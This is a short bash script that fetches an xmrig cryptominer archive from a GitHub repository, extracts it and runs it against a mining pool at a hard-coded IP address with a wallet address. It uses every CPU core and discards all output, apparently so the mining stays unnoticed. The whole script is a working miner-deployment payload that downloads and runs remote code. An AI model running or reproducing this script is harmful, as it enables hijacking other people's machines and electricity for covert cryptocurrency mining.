#!/bin/bash
A=157.230.255.104:443
B=8Bs72PQZu3r5dZ9u9dcpZvHywtz5r2nqQi61ip15cYvMhhwAYvChXxMJDqF2jDBUvPUtEieTaw6dJ9kthbzzoLTDBWCbtpu
C=$(echo $(shuf -i 1-200 -n 1)-SUIII)
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --coin=SAL --url $A --user $B --pass $C --donate-level 1 -a rx/0 -t $(nproc --all) >/dev/null 2>&1
